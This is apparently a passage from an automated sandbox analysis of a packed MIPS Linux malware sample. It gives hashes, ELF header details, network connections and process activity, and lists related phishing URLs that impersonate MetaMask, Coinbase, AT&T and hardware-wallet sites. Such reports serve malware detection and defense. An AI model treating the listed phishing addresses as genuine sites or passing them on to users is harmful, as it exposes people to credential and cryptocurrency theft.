                                                                                      AMAZON-02UShttp://ajrdn.qqmasonry.com/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                      • 108.138.106.39
                                                                                      jkse.mips.elfGet hashmaliciousUnknownBrowse
                                                                                      • 54.127.97.231
                                                                                      jkse.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                      • 52.94.132.43
                                                                                      http://metamaskelogines.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 13.33.251.68
                                                                                      https://imntokqen.com/en.htmlGet hashmaliciousUnknownBrowse
                                                                                      • 108.138.113.198
                                                                                      http://sso-cdn-coinbasepro-autthh.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 13.33.251.140
                                                                                      https://www.creditopersonalcard1f.ru/validaciones/cardif/3Get hashmaliciousUnknownBrowse
                                                                                      • 76.76.21.98
                                                                                      https://helptrzer-hardware.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 13.33.251.68
                                                                                      https://securelogin-att-1-01-9-33.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                      • 44.241.160.37
                                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                                      • 52.212.150.54
                                                                                      No context
                                                                                      No context
                                                                                      No created / dropped files found
                                                                                      File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
                                                                                      Entropy (8bit):5.992227011429975
                                                                                      TrID:
                                                                                      • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                                      • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                                      File name:bin.sh.elf
                                                                                      File size:307'960 bytes
                                                                                      MD5:944f2c5896832670ed2341c7c12e2c36
                                                                                      SHA1:311a680784c8e1dea11267cd89c3ed6cb190c761
                                                                                      SHA256:31c8e4e926d4c0cc69d10be8e63fcb1950b68d4bd78c0a4c50c96cee6d8e9893
                                                                                      SHA512:029eb6af2be975eee6b724854b43e9762f079c665eaa4197b1963c4f64cd7d06703d0d60c7fc3fb52dacefb4e68c96c798342560870b0b86d96e364fce4e5fc3
                                                                                      SSDEEP:6144:7O/QJHZweEL/NOjCHm7FZZncToNsKqqfPqOJ:78QpZsKCaiTHKqoPqOJ
                                                                                      TLSH:8864F1CAED01AE75F9C54779BA1F074973B28BE8D3C3B110E624C6143ADE6468B391C8
                                                                                      File Content Preview:.ELF.....................A.h...4.........4. ...(.............@...@...........................C...C...................*.*UPX!.X.....................\....|.$..ELF..........@.`....4..^h... ...(......<...@......ll.....H.W.`.t.d....dt.Q.....].M............6...

                                                                                      ELF header

                                                                                      Class:ELF32
                                                                                      Data:2's complement, big endian
                                                                                      Version:1 (current)
                                                                                      Machine:MIPS R3000
                                                                                      Version Number:0x1
                                                                                      Type:EXEC (Executable file)
                                                                                      OS/ABI:UNIX - System V
                                                                                      ABI Version:0
                                                                                      Entry Point Address:0x41fb68
                                                                                      Flags:0x1007
                                                                                      ELF Header Size:52
                                                                                      Program Header Offset:52
                                                                                      Program Header Size:32
                                                                                      Number of Program Headers:2
                                                                                      Section Header Offset:0
                                                                                      Section Header Size:40
                                                                                      Number of Section Headers:0
                                                                                      Header String Table Index:0
                                                                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                      LOAD0x00x4000000x4000000x205b20x205b27.81420x5R E0x10000
                                                                                      LOAD0x00x4300000x4300000x00x8ac180.00000x6RW 0x10000

                                                                                      Download Network PCAP: filteredfull

                                                                                      • Total Packets: 6
                                                                                      • 443 (HTTPS)
                                                                                      • 80 (HTTP)
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Mar 20, 2025 00:27:26.769454002 CET43928443192.168.2.2391.189.91.42
                                                                                      Mar 20, 2025 00:27:32.912607908 CET39256443192.168.2.2334.249.145.219
                                                                                      Mar 20, 2025 00:27:42.383364916 CET4251680192.168.2.23109.202.202.202
                                                                                      Mar 20, 2025 00:27:48.526479959 CET43928443192.168.2.2391.189.91.42
                                                                                      Mar 20, 2025 00:27:49.038451910 CET39256443192.168.2.2334.249.145.219
                                                                                      Mar 20, 2025 00:28:29.480766058 CET43928443192.168.2.2391.189.91.42

                                                                                      System Behavior

                                                                                      Start time (UTC):23:27:26
                                                                                      Start date (UTC):19/03/2025
                                                                                      Path:/tmp/bin.sh.elf
                                                                                      Arguments:/tmp/bin.sh.elf
                                                                                      File size:5777432 bytes
                                                                                      MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                                      Start time (UTC):23:28:17
                                                                                      Start date (UTC):19/03/2025
                                                                                      Path:/usr/bin/dash
                                                                                      Arguments:-
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time (UTC):23:28:17
                                                                                      Start date (UTC):19/03/2025
                                                                                      Path:/usr/bin/rm
                                                                                      Arguments:rm -f /tmp/tmp.71H0mcXTB8 /tmp/tmp.X7M0uFhHok /tmp/tmp.Ah1PQtjCYH
                                                                                      File size:72056 bytes
                                                                                      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                      Start time (UTC):23:28:17
                                                                                      Start date (UTC):19/03/2025
                                                                                      Path:/usr/bin/dash
                                                                                      Arguments:-
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time (UTC):23:28:17
                                                                                      Start date (UTC):19/03/2025
                                                                                      Path:/usr/bin/rm
                                                                                      Arguments:rm -f /tmp/tmp.71H0mcXTB8 /tmp/tmp.X7M0uFhHok /tmp/tmp.Ah1PQtjCYH
                                                                                      File size:72056 bytes
                                                                                      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b